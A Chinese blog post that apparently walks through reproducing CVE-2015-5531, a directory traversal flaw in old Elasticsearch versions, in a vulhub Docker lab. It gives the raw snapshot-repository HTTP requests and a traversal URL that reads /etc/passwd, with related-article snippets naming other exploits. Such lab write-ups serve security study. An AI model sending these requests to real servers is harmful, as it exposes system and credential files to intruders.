CVE-2015-5531 Elasticsearch 目录遍历漏洞

最新推荐文章于 2024-06-03 15:39:32 发布
最新推荐文章于 2024-06-03 15:39:32 发布
阅读量3k 收藏 2
点赞数
分类专栏: 漏洞 文章标签: 网络安全 apache solr
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51387754/article/details/121392977
版权

漏洞简介

漏洞类型:路径遍历
漏洞影响版本:1.0.0 – 1.6.0
攻击路径:远程
漏洞产生原因:源于程序没有充分过滤用户提交的输入,远程攻击者可借助目录遍历字符‘…’利用该漏洞访问包含敏感信息的任意文件。

先说说elasticsearch 的备份与快照功能
漏洞利用需要涉及到elasticsearch的备份功能,elasticsearch 提供了一套强大的API,使得elasticsearch备份非常简单
要实现备份功能。前提是elasticsearch 进程对备份目录有写入权限,一般来说我们可以利用/tmp 或者elasticsearch 自身的安装目录,默认情况下这两个目录elasticsearch 进程都是有写入权限的

漏洞复现

cd vulhub/elasticsearch/CVE-2015-5531/
docker-compose up -d

在这里插入图片描述1.5.1及以前,无需任何配置即可触发该漏洞。之后的新版,配置文件elasticsearch.yml中必须存在path.repo,该配置值为一个目录,且该目录必须可写,等于限制了备份仓库的根位置。不配置该值,默认不启动这个功能。
访问http://127.0.0.1:9200/
在这里插入图片描述新建一个厂库

PUT /_snapshot/test HTTP/1.1
Host: 127.0.0.1:9200
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 108

{
    "type": "fs",
    "settings": {
        "location": "/usr/share/elasticsearch/repo/test" 
    }
}

在这里插入图片描述
创建一个快照

PUT /_snapshot/tes2t HTTP/1.1
Host: 127.0.0.1:9200
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 126

{
    "type": "fs",
    "settings": {
        "location": "/usr/share/elasticsearch/repo/test/snapshot-backdata" 
    }
}

在这里插入图片描述读取文件/etc/passwd

http://127.0.0.1:9200/_snapshot/test/backdata%2f…%2f…%2f…%2f…%2f…%2f…%2f…%2f…%2fetc%2fpasswd
在这里插入图片描述
暂时没转为ASCII
在这里插入图片描述
在这里插入图片描述

GuiltyFet
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
目录遍历漏洞
L_lemo004的博客
09-22 1665
文章目录目录遍历概念漏洞成因漏洞利用二、目录遍历漏洞第二种情况应用程序操作文件,限制不严时导致访问Web目录以外的文件,包括读写文件和远程执行代码特征测试方法绕过字符过滤利用DVWA进行漏洞测试利用远程文件包含漏洞代码执行权限配置不当引起的本地文件包含漏洞防御措施 目录遍历 概念 目录遍历是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以是web根目录以外的文件),甚至执行系统命令。
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法1
08-08
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法1 ElasticSearch 是一个基于 Lucene 的搜索引擎,提供了强大的搜索功能。然而,在 2015 年,一种远程代码执行漏洞CVE-2015-1427)被发现,影响...
ElasticSearch 目录穿越漏洞CVE-2015-5531
EC_Carrot的博客
05-31 2053
漏洞背景 Elasticsearch是荷兰Elasticsearch公司的一套基于Lucene构建的开源分布式RESTful搜索引擎,它主要用于云计算中,并支持通过HTTP使用JSON进行数据索引。 Elasticsearch 1.6.1之前版本中存在目录遍历漏洞。远程攻击者可借助快照的API调用利用该漏洞读取任意文件。 影响版本 1.6.1以下 Tip: elasticsearch 1.5.1及以前,无需任何配置即可触发该漏洞。之后的新版,配置文件elasticsearch.yml中必须存在path.
tomcat系列漏洞利用
最新发布
2401_84488537的博客
06-03 1430
Tomcat 服务器是一个开源的轻量级Web应用服务器,在中小型系统和并发量小的场合下被普遍使用。主要组件:服务器Server,服务Service,连接器Connector、容器Container。连接器Connector和容器Container是Tomcat的核心。一个Container容器和一个或多个Connector组合在一起,加上其他一些支持的组件共同组成一个Service服务,有了Service服务便可以对外提供能力了。
CVE-2015-5531目录遍历漏洞
浅笑996的博客
11-26 1298
vulhub漏洞环境搭建 https://blog.csdn.net/qq_36374896/article/details/84102101 启动docker环境 cd vulhub-master/elasticsearch/CVE-2015-5531/ sudo docker-compose up 1.5.1及以前,无需任何配置即可触发该漏洞。之后的新版,配置文件elasticsearch...
ElasticSearch 目录穿越漏洞 CVE-2015-5531 漏洞复现
ADummy的博客
02-24 781
ElasticSearch 目录穿越漏洞CVE-2015-5531) by ADummy 0x00利用路线 ​ Burpsuite抓包—>java代码放入json—>有回显命令执行 0x01漏洞介绍 ​ 说明: elasticsearch 1.5.1及以前,无需任何配置即可触发该漏洞。之后的新版,配置文件elasticsearch.yml中必须存在path.repo,该配置值为一个目录,且该目录必须可写,等于限制了备份仓库的根位置。不配置该值,默认不启动这个功能。 jre版本:open
ElasticSearch目录穿越(CVE-2015-5531)
m0_65150886的博客
01-16 407
Elasticsearch是荷兰Elasticsearch公司的一套基于Lucene构建的开源分布式RESTful搜索引擎,它主要用于云计算中,并支持通过HTTP使用JSON进行数据索引。之后的新版,配置文件elasticsearch.yml中必须存在path.repo,该配置值为一个目录,且该目录必须可写,等于限制了备份仓库的根位置。不配置该值,默认不启动这个功能。使用以下URL查看passwd文档,返回的值为ASCII码,需要解码。1.访问http://ip:port,出现如下页面,开始实验。
cpx_proftpd:漏洞利用工具 CVE-2015-3306
06-11
Daniel Aldana 针对漏洞利用的 PoC。 Vadim Melihow 报告的错误。 ###方法1: 用法: python cpx_proftp.py <IP> <REMOTE> 前任: python cpx_proftp.py 127.0.0.1 /etc/passwd /var/www/pass.txt 然后尝试...
CVE-2015-1805漏洞验证
05-17
**CVE-2015-1805漏洞详解** CVE-2015-1805,也被称为“Stagefright 2.0”或“QuadRooter”,是Android操作系统中的一个严重安全漏洞。这个漏洞存在于Android的多媒体处理框架中,允许攻击者通过恶意MMS( ...
FREAK-Attack-CVE-2015-0204-Testing-Script:根据 Akamai 的建议,针对 FREAK 攻击 (CVE-2015-0204) 自动执行基于 OpenSSL 的测试的基本 BASH 脚本
06-20
根据 Akamai 的建议,针对 FREAK 攻击 (CVE-2015-0204) 自动执行基于 OpenSSL 的测试的基本 BASH 脚本。 它是一个免费软件,不需要别人的服务器来运行。 您的服务器在正常情况下必须通过 SSL Labs 测试获得 A+ 的...
CVE-2015-1701:APT攻击中使用的Win32k LPE漏洞
01-30
**CVE-2015-1701:APT攻击中的Win32k Local Privilege Escalation漏洞详解** 在2015年,安全研究人员发现了一个严重的问题,即CVE-2015-1701,这是一个针对Windows系统的本地权限提升(Local Privilege Escalation,...
实验室:用于安全性分析的漏洞实验室
02-05
名称 描述 CVE-2015-5531 1.6.1之前的Elasticsearch中的目录遍历漏洞允许远程攻击者通过与快照API调用相关的未指定向量读取任意文件。 CVE-2016-1909 5.0.12之前的Fortinet FortiAnalyzer和5.2.5之前的5.2.x; 3.3.3之前的FortiSwitch 3.3.x; 3.0.8之前的FortiCache 3.0.x; 和FortiOS 4.1.x之前的4.1.x,4.2.16之前的4.2.x,4.3.17之前的4.3.x和5.0.8之前的5.0.x具有Fortimanager_Access帐户的硬编码密码,这使远程攻
Elasticsearch 漏洞收集总结
sojrs_sec的博客
12-31 7666
一:未授权访问获取敏感信息 /_cat/indices /_plugin/sql/ /_nodes /_search /_search?preety /_status 二:目录遍历漏洞cve-2015-3337) 安装“site”功能的插件后,插件目录使用…/向上跳转,导致目录穿越漏洞,可读取任意文件。未安装site功能插件的不受影响 /_cat/plugins:查看所有已安装的插件 一般复现...
ElasticSearch是什么?Lucene是什么?
jj89929665的博客
02-02 763
ElasticSearch 分布式全文检索引擎 Elasticsearch是一个基于Lucene的搜索服务器。它提供了一个分布式多用户能力的全文搜索引擎,基于RESTful web接口(请求分类 get post delete put)。Elasticsearch是用Java语言开发的,并作为Apache许可条款下的开放源码发布,是一种流行的企业级搜索引擎。Elasticsearch用于云计算中,能够达到实时搜索,稳定,可靠,快速,安装使用方便。官方客户端在Java、.NET(C#)、PHP、Python
路径遍历攻击
常备不懈
05-30 472
路径遍历攻击(也称为目录遍历)旨在访问存储在 Web服务器根路径之外的文件和目录。通过操作一系列带有“点-点-斜线 (../)”及其变体的绝对文件路径,可以访问到存储在文件系统上的任意文件和目录,包括应用程序源代码或配置和关键系统文件。
目录遍历漏洞原理、解决方案
qq_44005305的博客
03-10 5473
目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令。
Elasticsearch 常见漏洞复现合集
寒星的博客
05-27 9193
Elasticsearch未授权访问 一、漏洞简介 ElasticSearch 是一款Java编写的企业级搜索服务,启动此服务默认会开放HTTP-9200端口,可被非法操作数据。 二、影响版本 ALL 三、复现过程 复现环境 vulhub 复现步骤 安装了river之后可以同步多种数据库数据(包括关系型的mysql、mongodb等)。 http://xxxxxxxx:9200/_cat/indices 里面的indices包含了_river一般就是安装了river了。 http://xxxxxxxx:9.
Java代码漏洞检测-常见漏洞与修复建议
baimao__Ch的博客
05-17 1226
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
Python版本修复cve-2015-20107漏洞
06-07
针对CVE-2015-20107漏洞,Python官方已经发布了修复该漏洞的补丁。如果您使用的是受影响的Python版本,建议尽快升级到最新版本。以下是修复该漏洞的Python版本: - Python 2.7.11及以上版本 - Python 3.3.6及以上...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

GuiltyFet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值